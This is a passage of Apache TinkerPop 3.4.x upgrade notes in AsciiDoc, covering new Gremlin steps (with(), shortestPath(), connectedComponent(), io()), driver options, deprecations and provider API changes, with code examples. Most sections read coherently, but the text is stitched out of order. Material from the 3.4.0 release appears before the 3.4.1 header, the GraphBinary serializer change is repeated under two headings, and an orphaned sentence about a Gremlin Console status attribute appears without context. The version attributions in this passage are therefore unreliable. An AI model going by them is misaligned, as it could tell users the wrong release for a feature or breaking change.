link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. 
While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior versions of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly used graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP-style loading, it can be utilized in conjunction with OLAP, which\ninternally uses `CloneVertexProgram`, and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOptions` instances. 
A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== min() max() and Comparable\n\nPreviously `min()` and `max()` only worked for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values led to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release, these kinds of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property, a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. 
To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. 
See: link:https://issues.apache.org/jira/browse/TINKERPOP-2111[TINKERPOP-2111]

==== Python Bindings

Bindings were formerly created using a Python 2-tuple as a bit of syntactic sugar, but all other language variants
used an explicit `Bindings` object, which `gremlin-python` already had in place. To make all variants behave
consistently, the 2-tuple syntax has been removed in favor of the explicit `Bindings.of()` option.

[source,python]
----
g.V(Bindings.of('id',1)).out('created').map(lambda: ("it.get().value('name').length()", "gremlin-groovy")).sum()
----

See: link:https://issues.apache.org/jira/browse/TINKERPOP-2116[TINKERPOP-2116]

==== Deprecation and Removal

This section describes newly deprecated classes, methods, components and patterns of usage as well as which previously
deprecated features have been officially removed or repurposed.

===== Moving of RemoteGraph

`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of
the `AnonymousTraversalSource` concept in 3.3.5. Its only real use was for testing remote bytecode-based traversals
in the test suite, as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph`
has been moved to `gremlin-test`. It should no longer be used in any capacity besides that.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-2079[TINKERPOP-2079]

===== Removal of Giraph Support

Support for Giraph has been removed as of this version. There were a number of reasons for this decision which were
discussed in the community prior to taking this step. Users should switch to Spark for their OLAP-based
graph-computing needs.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1930[TINKERPOP-1930]

===== Removal of Rebindings Options

The "rebindings" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not
respond to it on any channel - websockets, nio or HTTP. Use the "aliases" option instead.
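For Java driver users, the equivalent of the old rebindings behavior is an aliased `Client` (the traversal source
name "g1" below is illustrative of whatever is configured on the server):

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();
// route the "g" variable in submitted scripts to the server-side source named "g1"
Client aliased = client.alias("g1");
List<Result> results = aliased.submit("g.V().count()").all().get();
----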
See: link:https://issues.apache.org/jira/browse/TINKERPOP-1705[TINKERPOP-1705]

===== gremlin-server.sh -i Removal

The `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed.
Please use `install` as its replacement going forward.
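For example, where `-i` was once supplied, a dependency is now installed with (the coordinates below are merely a
sample):

```
bin/gremlin-server.sh install org.apache.tinkerpop neo4j-gremlin 3.4.0
```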
See: link:https://issues.apache.org/jira/browse/TINKERPOP-2031[TINKERPOP-2031]

===== Deprecation Removal

The following deprecated classes, methods or fields have been removed in this version:

* `gremlin-core`
** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`
** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`
** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`
** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`
** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`
** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`
** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`
** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`
** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`
** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`
** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`
** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`
** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`
** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`
** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`
** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`
* `gremlin-driver`
** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`
** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`
** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`
* `gremlin-groovy`
** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`
* `gremlin-server`
** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`
** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`
** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`
** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`
** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`
** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`
* `hadoop-graph`
** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`
** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`

Please see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to
understand how to resolve this breaking change.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1143[TINKERPOP-1143],
link:https://issues.apache.org/jira/browse/TINKERPOP-1296[TINKERPOP-1296],
link:https://issues.apache.org/jira/browse/TINKERPOP-1705[TINKERPOP-1705],
link:https://issues.apache.org/jira/browse/TINKERPOP-1707[TINKERPOP-1707],
link:https://issues.apache.org/jira/browse/TINKERPOP-1954[TINKERPOP-1954],
link:https://issues.apache.org/jira/browse/TINKERPOP-1986[TINKERPOP-1986],
link:https://issues.apache.org/jira/browse/TINKERPOP-2079[TINKERPOP-2079],
link:https://issues.apache.org/jira/browse/TINKERPOP-2103[TINKERPOP-2103]

===== Deprecated GraphSONMessageSerializerGremlinV2d0

The `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and
therefore redundant. It has technically always been equivalent in terms of functionality, as both serialized to the
same format (i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established
this way, but it did carry the negative effect that multiple serializer versions could not be bound to Gremlin
Server's HTTP endpoint, as the MIME types conflicted on `application/json`. By making both message serializers
support `application/json` and `application/vnd.gremlin-v2.0+json`, it became possible to overcome that limitation.
In short, prefer use of `GraphSONMessageSerializerV2d0` when possible.

Note that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header
of request messages to `application/json`. As a result, older versions of Gremlin Server not configured with
`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.
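For Java driver users the preference is expressed when building the `Cluster` - the sketch below assumes that the
`Serializers.GRAPHSON_V2D0` enum resolves to `GraphSONMessageSerializerV2d0`:

[source,java]
----
Cluster cluster = Cluster.build("localhost").port(8182).
        serializer(Serializers.GRAPHSON_V2D0).
        create();
Client client = cluster.connect();
----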
See: link:https://issues.apache.org/jira/browse/TINKERPOP-1984[TINKERPOP-1984]

===== Removed groovy-sql Dependency

Gremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql, you can install it in
Gremlin Console or Gremlin Server using the plugin system.

Console:
```
:install org.codehaus.groovy groovy-sql 2.5.2
```

Server:
```
bin/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2
```

If your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. Maven: pom.xml).

See: link:https://issues.apache.org/jira/browse/TINKERPOP-2037[TINKERPOP-2037]

=== Upgrading for Providers

==== Graph Database Providers

===== io() Step

The new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been
deprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be
removed completely, but given its public nature and the high chance of common usage, it should be hanging around for
some time.

As with any step in Gremlin, it is possible to replace it with a more provider-specific implementation that could be
more efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who
might have special bulk loaders that could be abstracted by this step. An example of this is already shown with
`HadoopGraph`, which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are
encouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to
work. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph
supports CSV or some custom graph-specific format, it shouldn't be difficult to gather the configurations necessary
to make that available to users.
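As a sketch of how such configurations surface in the Gremlin language, the built-in `IO.reader` and `IO.writer`
hints select a format, and a provider strategy replacing the `io()`-step could read the same kind of `with()`
configurations (the file names below are illustrative):

[source,java]
----
// requires org.apache.tinkerpop.gremlin.structure.io.IO
g.io("data/sample.json").with(IO.reader, IO.graphson).read().iterate();
g.io("data/sample.kryo").with(IO.writer, IO.gryo).write().iterate();
----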
See: link:https://issues.apache.org/jira/browse/TINKERPOP-1996[TINKERPOP-1996]

===== Caching Graph Features

For graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test
suite, as each test run requires a `Graph` instance even if the test is ultimately ignored because it doesn't pass
the feature checks. To help alleviate this problem, the `GraphProvider` interface now includes this method:

[source,java]
----
public default Optional<Graph.Features> getStaticFeatures() {
    return Optional.empty();
}
----

This method can be implemented to return a cacheable set of features for a `Graph` generated from that
`GraphProvider`. Assuming this method is faster than the cost of creating a new `Graph` instance, the test suite
should execute significantly faster depending on how many tests end up being ignored.
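A minimal implementation sketch follows - the `MyGraph` and `MyGraphProvider` names are hypothetical and the approach
assumes the graph's features never vary from instance to instance:

[source,java]
----
public class MyGraphProvider extends AbstractGraphProvider {
    // computed once and shared across the whole test run
    private static final Graph.Features FEATURES = MyGraph.open().features();

    @Override
    public Optional<Graph.Features> getStaticFeatures() {
        return Optional.of(FEATURES);
    }

    // remainder of the GraphProvider contract omitted for brevity
}
----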
See: link:https://issues.apache.org/jira/browse/TINKERPOP-1518[TINKERPOP-1518]

===== Configuring Interface

There were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was
helpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing`
interface (which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step
interfaces) and in turn is extended by the `Mutating` interface. Making this change meant that the
`Mutating.addPropertyMutations()` method could be removed in favor of the new `Configuring.configure()` method.

All of the changes above basically mean that if the `Mutating` interface was being used in prior versions, the
`addPropertyMutations()` method simply needs to be changed to `configure()`.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1975[TINKERPOP-1975]

===== OptionsStrategy

`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a
`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be
accessible to their custom steps. A user would write something like:

[source,java]
----
g.withStrategies(OptionsStrategy.build().with("specialLimit", 10000).create()).V();
----

The `OptionsStrategy` is really only the carrier for the configurations, and while users can choose the more verbose
construction shown above, it is more elegantly constructed as follows using the `with()`-step:

[source,java]
----
g.with("specialLimit", 10000).V();
----

The graph provider could then access the value of "specialLimit" in their custom step (or elsewhere) as follows:

[source,java]
----
OptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();
int specialLimit = (int) strategy.getOptions().get("specialLimit");
----

See: link:https://issues.apache.org/jira/browse/TINKERPOP-2053[TINKERPOP-2053]

===== Removed hadoop-gremlin Test Artifact

The `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.
Generally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't
always obvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have
this test artifact present. All tests are still present. The following provides a basic summary of how this
refactoring occurred:

* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that
`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class
now.
* `ToyIoRegistry` and related classes were moved to `gremlin-test`.
* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those
tests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for
some reason, that decision can be revisited at some point.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1410[TINKERPOP-1410]

===== TraversalEngine Moved

The `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that
implemented it. It was replaced by the `Computer` interface, which provided a much nicer way to plug different
implementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed, however, as it had some
deep dependencies in the inner workings of the test suite. That infrastructure has largely remained as-is until now.

As of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test`, as it is
effectively a "test-only" component and serves no other real function. As explained in the javadocs going back to
3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should
have long ago moved to the `Computer` infrastructure, as methods for constructing a `TraversalSource` with a
`TraversalEngine` were long ago removed.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1143[TINKERPOP-1143]

===== Upsert Graph Feature

Some `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve
usability and performance. To help make it clear to users that a graph operates in this fashion, the
`supportsUpsert()` feature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both
of these methods will return `false`.

Should a provider wish to support this feature, the behavior of `addV()` and/or `addE()` should change such that when
a vertex or edge with the same identifier is provided, the respective step will insert the new element if that value
is not present or update an existing element if it is found. The method by which the provider "identifies" an element
is completely up to the capabilities of that provider. In the simplest fashion, a graph could check the value of the
supplied `T.id`; however, graphs that support some form of schema will likely have other methods for determining
whether or not an existing element is present.

The extent to which TinkerPop tests "upsert" is fairly narrow. Graph providers that choose to support this feature
should consider their own test suites carefully to ensure appropriate coverage.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-1685[TINKERPOP-1685]

===== TypeTranslator Changes

The `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.

`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the
object to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`,
which encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customized
translation, simply extend the `DefaultTypeTranslator` and override the methods.

`GroovyTranslator` now expects that the `TypeTranslator` provided to it as part of its `of()` static method overload
is "complete" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a "complete"
`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,
the extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.

See: link:https://issues.apache.org/jira/browse/TINKERPOP-2072[TINKERPOP-2072]

==== Graph Driver Providers

===== Deprecation Removal in RemoteConnection

The two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means
that `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done
so.
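A skeleton of what implementers now need to provide is sketched below - the class name is hypothetical and the
transport details are elided, but the signature reflects the remaining abstract method on the interface:

[source,java]
----
public class MyRemoteConnection implements RemoteConnection {
    @Override
    public <E> CompletableFuture<RemoteTraversal<?, E>> submitAsync(final Bytecode bytecode)
            throws RemoteConnectionException {
        final CompletableFuture<RemoteTraversal<?, E>> future = new CompletableFuture<>();
        // send the bytecode to the remote server and complete the future with
        // a RemoteTraversal over the results (provider-specific transport here)
        return future;
    }

    @Override
    public void close() throws Exception {
        // release any transport resources held by this connection
    }
}
----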
See: link:https://issues.apache.org/jira/browse/TINKERPOP-2103[TINKERPOP-2103]
Note that Gremlin Console is one such tool that will respond to this status attribute - it\nwill print the messages to the console as they are detected when doing remote script submissions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2216[TINKERPOP-2216]\n\n==== Graph Driver Providers\n\n===== GraphBinary API Change\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.1\n\n*Release Date: March 18, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.1\/CHANGELOG.asciidoc#release-3-4-1[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Mix SPARQL and Gremlin\n\nIn the initial release of `sparql-gremlin` it was only possible to execute a SPARQL query and have it translate to\nGremlin. Therefore, it was only possible to write a query like this:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\")\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\ngremlin> g.sparql(\"SELECT * WHERE { }\")\n==>v[1]\n==>v[2]\n==>v[3]\n==>v[4]\n==>v[5]\n==>v[6]\n----\n\nIn this release, however, it is now possible to further process that result with Gremlin steps:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\").select(\"name\")\n==>marko\n==>vadas\n==>josh\n==>peter\ngremlin> g.sparql(\"SELECT * WHERE { }\").out(\"knows\").values(\"name\")\n==>vadas\n==>josh\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2171[TINKERPOP-2171],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.1\/reference\/#sparql-with-gremlin[Reference Documentation]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== GraphBinary Serializer Changes\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . 
?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> 